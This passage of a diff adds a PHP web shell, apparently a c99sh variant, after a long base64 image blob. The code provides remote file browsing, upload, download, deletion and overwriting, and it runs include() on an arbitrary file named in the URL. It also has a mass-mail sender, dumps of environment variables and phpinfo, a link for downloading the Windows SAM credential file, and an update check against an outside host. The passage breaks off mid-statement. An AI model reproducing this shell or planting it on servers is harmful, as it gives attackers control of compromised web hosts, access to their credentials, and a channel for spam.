+Xg96D5YPsw/PD+wQCRAmEEMQYRB+EJsQuRDXEPURExExEU8RbRGMEaoRyRHoEgcSJhJFEmQShBKj
+EsMS4xMDEyMTQxNjE4MTpBPFE+UUBhQnFEkUahSLFK0UzhTwFRIVNBVWFXgVmxW9FeAWAxYmFkkW
+bBaPFrIW1hb6Fx0XQRdlF4kXrhfSF/cYGxhAGGUYihivGNUY+hkgGUUZaxmRGbcZ3RoEGioaURp3
+Gp4axRrsGxQbOxtjG4obshvaHAIcKhxSHHscoxzMHPUdHh1HHXAdmR3DHeweFh5AHmoelB6+Hukf
+Ex8+H2kflB+/H+ogFSBBIGwgmCDEIPAhHCFIIXUhoSHOIfsiJyJVIoIiryLdIwojOCNmI5QjwiPw
+JB8kTSR8JKsk2iUJJTglaCWXJccl9yYnJlcmhya3JugnGCdJJ3onqyfcKA0oPyhxKKIo1CkGKTgp
+aymdKdAqAio1KmgqmyrPKwIrNitpK50r0SwFLDksbiyiLNctDC1BLXYtqy3hLhYuTC6CLrcu7i8k
+L1ovkS/HL/4wNTBsMKQw2zESMUoxgjG6MfIyKjJjMpsy1DMNM0YzfzO4M/E0KzRlNJ402DUTNU01
+hzXCNf02NzZyNq426TckN2A3nDfXOBQ4UDiMOMg5BTlCOX85vDn5OjY6dDqyOu87LTtrO6o76Dwn
+PGU8pDzjPSI9YT2hPeA+ID5gPqA+4D8hP2E/oj/iQCNAZECmQOdBKUFqQaxB7kIwQnJCtUL3QzpD
+fUPARANER0SKRM5FEkVVRZpF3kYiRmdGq0bwRzVHe0fASAVIS0iRSNdJHUljSalJ8Eo3Sn1KxEsM
+S1NLmkviTCpMcky6TQJNSk2TTdxOJU5uTrdPAE9JT5NP3VAnUHFQu1EGUVBRm1HmUjFSfFLHUxNT
+X1OqU/ZUQlSPVNtVKFV1VcJWD1ZcVqlW91dEV5JX4FgvWH1Yy1kaWWlZuFoHWlZaplr1W0VblVvl
+XDVchlzWXSddeF3JXhpebF69Xw9fYV+zYAVgV2CqYPxhT2GiYfViSWKcYvBjQ2OXY+tkQGSUZOll
+PWWSZedmPWaSZuhnPWeTZ+loP2iWaOxpQ2maafFqSGqfavdrT2una/9sV2yvbQhtYG25bhJua27E
+bx5veG/RcCtwhnDgcTpxlXHwcktypnMBc11zuHQUdHB0zHUodYV14XY+dpt2+HdWd7N4EXhueMx5
+KnmJeed6RnqlewR7Y3vCfCF8gXzhfUF9oX4BfmJ+wn8jf4R/5YBHgKiBCoFrgc2CMIKSgvSDV4O6
+hB2EgITjhUeFq4YOhnKG14c7h5+IBIhpiM6JM4mZif6KZIrKizCLlov8jGOMyo0xjZiN/45mjs6P
+No+ekAaQbpDWkT+RqJIRknqS45NNk7aUIJSKlPSVX5XJljSWn5cKl3WX4JhMmLiZJJmQmfyaaJrV
+m0Kbr5wcnImc951kndKeQJ6unx2fi5/6oGmg2KFHobaiJqKWowajdqPmpFakx6U4pammGqaLpv2n
+bqfgqFKoxKk3qamqHKqPqwKrdavprFys0K1ErbiuLa6hrxavi7AAsHWw6rFgsdayS7LCszizrrQl
+tJy1E7WKtgG2ebbwt2i34LhZuNG5SrnCuju6tbsuu6e8IbybvRW9j74KvoS+/796v/XAcMDswWfB
+48JfwtvDWMPUxFHEzsVLxcjGRsbDx0HHv8g9yLzJOsm5yjjKt8s2y7bMNcy1zTXNtc42zrbPN8+4
+0DnQutE80b7SP9LB00TTxtRJ1MvVTtXR1lXW2Ndc1+DYZNjo2WzZ8dp22vvbgNwF3IrdEN2W3hze
+ot8p36/gNuC94UThzOJT4tvjY+Pr5HPk/OWE5g3mlucf56noMui86Ubp0Opb6uXrcOv77IbtEe2c
+7ijutO9A78zwWPDl8XLx//KM8xnzp/Q09ML1UPXe9m32+/eK+Bn4qPk4+cf6V/rn+3f8B/yY/Sn9
+uv5L/tz/bf///+4AJkFkb2JlAGTAAAAAAQMAFQQDBgoNAAARtgAAF0YAABuaAAAgJv/bAIQAAgIC
+AgICAgICAgMCAgIDBAMCAgMEBQQEBAQEBQYFBQUFBQUGBgcHCAcHBgkJCgoJCQwMDAwMDAwMDAwM
+DAwMDAEDAwMFBAUJBgYJDQsJCw0PDg4ODg8PDAwMDAwPDwwMDAwMDA8MDAwMDAwMDAwMDAwMDAwM
+DAwMDAwMDAwMDAwM/8IAEQgAHgK8AwERAAIRAQMRAf/EALsAAQACAwEBAAAAAAAAAAAAAAADBQIE
+BgEHAQEAAAAAAAAAAAAAAAAAAAAAEAACAgMBAQADAQEBAAAAAAAAEwQFAiIDARQREhWAIyQRAAAE
+BQIDBwMBBwUAAAAAAAABAgMx0ZMENBEhEhMzQVFhkZLS4nGBIuEQQKGxYmMUMkKiIyQSAQAAAAAA
+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
++zXfZrvs132a77Nd9mu+zXfZrvs132a77Nd9mu+zXfZrvs132a77Nd9hDoCEIDJH0YKJQIKsDpgW
+BfgWUacgTAkoAgLreSxYtgGTAgEigAAvbnQJqy1XRBCSCWEVMchsge1InEoImkEAkMAH/sdKetgQ
+kASVTK8FiNrM/AhGUmWFC84tGEEIJ5RFIeaZNEkqJGAtGH9aGVEkQK9iYINvSQJEWxHx2GpQBhIZ
+Bwa5prvsetQWpqEgLI4+OzcwGApE5roM4Eu/YDCCBAMieFfBZSsOoDACQEHAbkYf0IZUWIX6nQJO
+w62AFEGLNU+OxSbDMMAANgOKD/1AqpAOSsWwMaELlEEQCYKpJE9qwuJkvAWgb+ClcKADkz4Up5Qz
+TxEJQAcyJrvsqBdIAhhBpJzmdAkR8IeVKsg9DCCV0agEguPOgXgsWiK8GNikQ4KIUpBfAIBQg4hg
+UfXgsdzaMhkEYAkEs+4YONNACBEVI48oB1UQAmcCjixmu+zXfZrvs132a77Nd9mu+zXfZrvs132a
+77Nd9mu+zXfZrvs132a77M4vHcD0bsgCNLS0tLS0tLS0tLS0tLS0tLS0tIQCaCCAiIIRIYxgGAAE
+DASu6kMCYrUEwf3KKyAa4AFNgEfJ07XjXnEUNgCkGnjzgoF87YASAqpafa6qSEAUEPAOQwIwUTBq
+M4GXOYNycAq0VeCVEHAwaqASwJA3vKOkSCoKklVYxMho3wRgMTBArTKiAKJDmW1ZMYNg04tgNRQA
+GRfqJaO7aLDIEaRCItkwsQioJeCRUlgMCuoUccoQc7MHmIirHwSa3ykQMExEkVRUH0VJkoAfoePN
+LB4gFFJyQcCcfBIXbhwohAYUGGRgsMQ9QNhxcYrSACA4olyporJJQTAYmCrSWztEgkcivHkkjWVT
+KECVLCNI5BU2AAEisiJBB8eTTWGAFQEBAOhizrgQGlgEml44rQwwYrgUMIDTlBFQzCyW1RRpsEBM
+llACB+vB1rBwQDohIMs84NBEfCBQcNho4ThDyEQUlvwUCNLS0tLS0tLS0tLS0tLS0tLS32X3K0CG
+YwXud1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1
+yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3
+XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yn
+dcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcpi/Yhm9z//2gAI
+AQIDAT8Q/rB//9oACAEDAwE/EP6wf//Z");
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  echo base64_decode($images[$_GET['pic']]);
+}
+
+$ps=str_replace("\\","/",getenv('DOCUMENT_ROOT'));
+//file_array
+$file_tps=array(
+"img"=>array("jpg","bmp","gif","ico"),
+"act" => array("edit","copy","download","delete"),
+"zip" => array("gzip","zip","rar")
+);
+$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+ @ob_clean();
+//end
+if (isset($_GET['img'])) {
+   for ($i=0;$i<4;$i++) {
+     if (preg_match("/".$file_tps["img"][$i]."/i",$extn)) {
+    header("Content-type: ".$inf["mime"]);
+    readfile(urldecode($filename));
+    exit;
+
+     }
+ }
+}
+
+
+if (!function_exists(download)) {
+   function download($file) {
+   header('Pragma: anytextexeptno-cache', true);
+      header('Content-type: application/force-download');
+          header('Content-Transfer-Encoding: Binary');
+              header('Content-length: '.filesize($file));
+                  header('Content-disposition: attachment;
+                      filename='.basename($file));
+                          readfile($file);
+                          exit;
+   }
+}
+if (isset($_GET['download'])) {
+download($filename);
+exit;
+}
+
+if (isset($_GET['run'])) {
+echo urldecode($_GET['file']);
+include(urldecode($_GET['file']));
+exit;
+}
+
+
+function check_update() 
+{
+$cur_ver=5; //very important value for updates!Please dont change!
+$newer=$cur_ver+1;
+$url="http://dc3.dl.am/";
+$file=@fopen($url."".$newer.".txt","r") or die ("No updates aviable!");
+$text=fread($file,1000000);
+if (preg_match("/ver=".$newer."/i", $text)) {
+   echo "[+]Update Aviable!...Please download new version from:";
+echo "<br><a href=".$url.$newer.".txt>Version ".$newer."</a>";
+} }
+
+function get_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+echo  $type.join("",$owner).join("",$group).join("",$world);
+}
+
+
+
+if (!function_exists(get_space)) {
+   function get_space($dir) {
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_f = @round(48.7/($all/$free),2);
+echo "".$used_f."";
+     }
+ }
+$sys=strtolower(substr(PHP_OS,0,3));
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+echo "<img  src=".$surl."?&".$word."&dir&pic=o.b height= width=>";
+echo getenv('SERVER_SOFTWARE');
+echo "<br>";
+echo getenv('SERVER_NAME');
+echo ":";
+echo getenv('SERVER_PORT');
+echo "<br>";
+echo getenv('SERVER_ADMIN');
+
+if ($sys=="win") {
+echo "Windows";
+echo "<br>";
+echo  "".getenv('COMPUTERNAME')."";
+echo "<br>";
+echo "Os:".getenv('OS')."";
+} else {
+echo "<br>Linux";
+}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+$safe=1;
+echo "<br><font color=red>ON (secure)</font>";
+ } else {
+$save=2;
+if ($sys=="win") {
+echo "<br><font color=green><a href=".$surl."?&".$word."&file_browser&file=C:/Windows/repair/sam&download>Off (not secure)</a></font>";
+}
+}
+if (isset($_GET['file']))  {
+echo "<br>Access:";
+if (@is_readable($j_f)) {
+   echo "R";
+}
+if (@is_executable($j_f)) {
+ echo "E";
+}
+if (@is_writable($j_d)) {
+echo "W";
+}
+echo "<br>Current_file:";
+echo "<a href=".$surl."?&".$word."&file_browser&file=";
+echo urlencode($p) ;
+echo ">".$p."</a>";
+ }
+echo "<br>";
+echo "Start_dir:";
+echo "&ensp;&ensp;&ensp;";
+echo "<a href=".$surl."?&".$word."&file_browser&file=";
+echo urlencode($ps);
+echo ">".$ps."</a>";
+echo "<br>";
+if (isset($_GET['file'])) {
+echo "Free Space:";
+get_space(urldecode($_GET['file']));
+
+echo "gb";
+}
+echo "</td>";
+?>
+
+<style type="text/css">
+body { background-color:#8B8989;font-family:trebuchet Ms; color:black }
+
+textarea {
+border-top-width: 1px; 
+font-weight: bold; 
+border-left-width: 1px; 
+font-size: 10px; 
+border-left-color: #8B8989; 
+background:#8B8989; 
+border-bottom-width: 1px; 
+border-bottom-color:#8B8989; 
+color: black; 
+border-top-color:#8B8989; 
+font-family: trebuchet Ms; 
+border-right-width: 1px; 
+border-right-color: #8B8989;
+}
+input {
+border-top-width: 1px; 
+font-weight: bold; 
+border-left-width: 1px; 
+font-size: 10px; 
+border-left-color: #8B8989; 
+background: #8B8989; 
+border-bottom-width: 1px; 
+border-bottom-color: #8B8989; 
+color: black; 
+border-top-color:#8B8989; 
+font-family: trebuchet Ms; 
+border-right-width: 1px; 
+border-right-color:#8B8989;
+}
+td {
+    font-size: 10px; 
+    font-family: verdana;
+}
+th {
+    font-size: 10px; 
+    font-family: verdana;
+}
+a:link {
+    text-decoration: none;
+}
+a:visited {
+    text-decoration: none;
+        color:blue;
+}
+a:active {
+    text-decoration: none;
+}
+a:hover {
+    color: #00ff00; 
+    text-decoration: none;
+}
+back {
+background-color:grey;
+}
+ ul#Navigation {
+position:absolute;
+    width: 10em;
+    margin: 0; padding: 0.8em;
+    border: 1px solid #8B8989;
+    background-color: #8B8989;
+  }
+  * html ul#Navigation {  /* Korrekturen fuer IE 5.x */
+    width: 11.6em;
+    w\idth: 10em;
+    padding-left: 0;
+    padd\ing-left: 0.8em;
+  }
+  ul#Navigation li {
+    list-style: none;
+    margin: 0.4em; padding: 0;
+  }
+
+  ul#Navigation a {
+    display:block;
+    padding: 0.2em;
+    text-decoration: none; font-weight: bold;
+    border: 1px solid black;
+    border-left-color: black; border-top-color: black;
+    color: black; background-color: #8B8989;
+  }
+  * html ul#Navigation a {  /* Breitenangaben nur fuer IE */
+    width: 100%;
+    w\idth: 8.8em;
+  }
+  ul#Navigation a:hover {
+    border-color: white;
+    border-left-color: black; border-top-color: black;
+    color: white; background-color: #8B8989;
+  }
+</style>
+
+<?php
+if (!function_exists(rename_all)) {
+    function rename_all($dir,$prefix,$name,$del) {
+     $r_dir=opendir($dir);
+       while (false !== ($file_r = readdir($r_dir))) {
+         if (@filetype($dir."/".$file_r)=="file") {
+           $i++;
+        @copy($dir."/".$file_r,$dir."/".$i.".".$prefix.$name) or die ("[-]Error renaming file : ".$file_r."");
+         if ($del=="yes") {
+          @unlink($dir."/".$file_r) or die ("[-]Error deleting file(s)!");
+        }
+       }
+       
+      }
+       echo "Successfully renamed file(s)!";
+    }
+  }
+        
+        
+
+if (!function_exists(get_perms)) {
+     function get_perms($file) {
+    if (@file_exists($file)) {
+      if (@is_readable($file)) {
+        echo "<b>R</b>";
+         }
+           if (@is_executable($file)) {
+            echo "<b>E</b>";
+             }
+               if (@is_writable($file)) {
+                echo "<b>W</b>";
+                }
+              } else {
+                 echo "[-]Error";
+               }
+            }
+          }
+
+if (!function_exists(search_file)) {
+   function search_file($search,$dir) {
+    global $word;
+     global $surl;
+    $d_s=opendir($dir);
+    while (false !== ($file_s = readdir($d_s))) {
+      if (preg_match("/".$search."/i",$file_s))   {
+         echo "<a href=".$surl."?&".$word."&file_browser&file=".urlencode($dir)."/".urlencode($file_s).">".$file_s."</a><br>";
+         }
+       }
+     }
+   }
+
+
+if (!function_exists(copy_file)) {
+    function copy_file($file,$to) {
+   if (@file_exists($file)) {
+     @copy($file,$to) or die ("[-]Error copying file!");
+      echo "Successfully copied file!";
+       } else {
+           echo "[-]File Doesnt exist!";
+       }
+    }
+ }
+
+if (!function_exists(send_mail)) {
+   function send_mail($from,$to,$text,$subject,$times) {
+              while ($i<$times) {
+               $i++;
+               $header  = "From: $from\r\n";    
+                @mail($to, $subject, $text, $header) or die ("[-]Error sending mail(s)!");
+
+              }
+                   echo "Successfully sent mail(s) to ".$to."!";
+   }
+ }
+
+
+if (!function_exists(read_file)) {
+   function read_file($file) {
+$file=@fopen($file,"r");
+echo fread($file,10000);
+fclose($file);
+       }
+     }
+
+if (!function_exists(write_file)) {
+   function write_file($file,$text) {
+     if (@is_writable($file)) {
+      if (@file_exists($file)) {
+        $file_w=@fopen(urldecode($file),"w") or die ("[-]Error");
+         if (fwrite($file_w,$text)) {
+            echo "Successfully written to file(s)!";
+          }
+        }
+     }
+           else {
+           echo "[-]Error";
+            exit;
+     }
+   }
+ }
+      
+
+
+if (!function_exists(count_all)) {
+     function count_all($dir) {
+       $c_d=opendir($dir);
+        while (false !== ($file_c = readdir($c_d))) {
+         if (@filetype($dir."/".$file_c)=="file") {
+            $file_c_s++;
+         } 
+           else 
+         { 
+            $dir_c++;
+         }
+        }
+       echo "Directories:";
+        echo $dir_c++;
+         echo "||";
+          echo "Files:";
+            echo $file_c_s;
+     }
+}
+
+if (!function_exists(check_access)) {
+   function check_access($file) {
+     if (@is_readable($file)) {
+       echo "R";
+        }
+         if (@is_executable($file)) {
+           echo "E";
+             } 
+              if (@is_writable($file)) {
+                echo "W"; 
+                 }
+              } 
+           }
+
+if (!function_exists(clear_dir)) {
+   function clear_dir($dir) {
+$o_d=opendir($dir);
+   while (false !== ($file = readdir($o_d))) {
+    if (@filetype(urldecode($_GET['file'])."/".$file)=="file") {
+unlink(urldecode($dir)."/".$file) or die ("[-]Error @ file:".$file."");
+   }
+ }
+echo "Successfully cleared directory!";
+   }
+ }
+
+?>
+
+
+<?php
+// real code start !
+
+
+if (isset($_GET['update'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+check_update();
+exit;
+}
+if (isset($_GET['rmdir']))  {
+echo "<center><table border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+@rmdir($_GET['file']) or die ("[-]Error deleting dir!");
+echo "Successfully deleted dir(s)!";
+exit;
+}
+
+
+if (isset($_GET['upload'])) {
+$uploaddir = urldecode($_POST['file']);
+
+print "<pre>";
+if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir ."/". $_FILES['userfile']['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+   print "Successfully uploadet file(s)!";
+} else {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+   print "[-]Error";
+}
+exit;
+}
+
+if (isset($_GET['search'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+
+    <tr><td>";
+search_file($_POST['search'],urldecode($_POST['dir']));
+exit;
+}
+
+
+
+
+if (isset($_GET['getenv'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo getenv($_GET['getenv']);
+exit;
+}
+
+
+if (isset($_GET['php_info'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+phpinfo();
+exit;
+}
+
+if (isset($_GET['defined_vars'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo "<center><textarea rows=40 cols=120>";
+$vars=get_defined_vars();
+print_r($vars);
+echo "</textarea>";
+
+exit;
+}
+
+if (isset($_GET['env'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead><br>
+    <tr><td>";
+$ary=get_defined_vars();
